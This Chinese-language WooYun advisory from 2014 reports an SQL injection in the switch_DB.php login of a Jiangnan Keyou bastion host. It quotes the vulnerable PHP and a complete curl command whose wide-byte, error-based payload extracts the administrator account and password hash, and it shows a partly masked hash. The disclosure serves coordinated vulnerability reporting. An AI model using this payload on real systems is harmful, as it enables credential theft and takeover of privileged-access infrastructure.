当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077316

漏洞标题:江南科友堡垒机最新SQL注入可getshell

相关厂商:江南科友

漏洞作者: 路人甲

提交时间:2014-09-26 15:12

修复时间:2014-12-25 15:14

公开时间:2014-12-25 15:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-26: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-02: 细节向第三方安全合作伙伴开放
2014-11-23: 细节向核心白帽子及相关领域专家公开
2014-12-03: 细节向普通白帽子公开
2014-12-13: 细节向实习白帽子公开
2014-12-25: 细节向公众公开

简要描述:

江南科友堡垒机最新SQL注入可getshell

详细说明:

0x01 存在漏洞的文件
/admin/switch_DB.php
0x02 漏洞利用细节
存在漏洞的代码为

<?php
require_once('class.smarttemplate.php');
require_once('ErrorHandler.php');
require_once('SessionExpire.php');
require_once('LoginDB.php');
require_once('InitConfig.php');
require_once('CommonPermission.php');
require_once('CommonLogo.php');
try {
$initphp = 'switchDB.php';
$UserACC=$_POST['account'];
$UserPSSD=$_POST['password'];
if ((strlen($UserACC)==0) || (strlen($UserPSSD)==0)) {

$st = new SmartTemplate('loginDB.html');
$st->assign('disabflag','');
$st->assign('msg','请输入登录名、密码');
$st->assign('account','');
$st->assign('password','');
$st->output();
exit;
}
$db = new Login_DB();
$user = $db -> getUserByAccount($_POST['account']);
//...
?>


经测试发现,$_POST['account'] 存在SQL注入
CURL测试:
curl -d "button_login=%B5%C7+%C2%BC&account=aaa%bf'+and+exists(select*from+(select*from(select+name_const((select+concat(account,password)+from+manager+limit+0,1),0))a+join+(select+name_const((select+concat(account,password)+from+manager+limit+0,1),0))b)c)#&password=aaa" https://1xx.xx.xx.xxx/admin/switch_DB.php --insecure

11.jpg


管理员帐号密码为:
Administrator::F662DC79DD2A****6E33FFAD843792DBC99BFDB7
登录后,有很多命令执行,很容易getshell,不再演示。

漏洞证明:

Administrator::F662DC79DD2A****6E33FFAD843792DBC99BFDB7

11.jpg

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-09-29 10:58

厂商回复:

最新状态:

暂无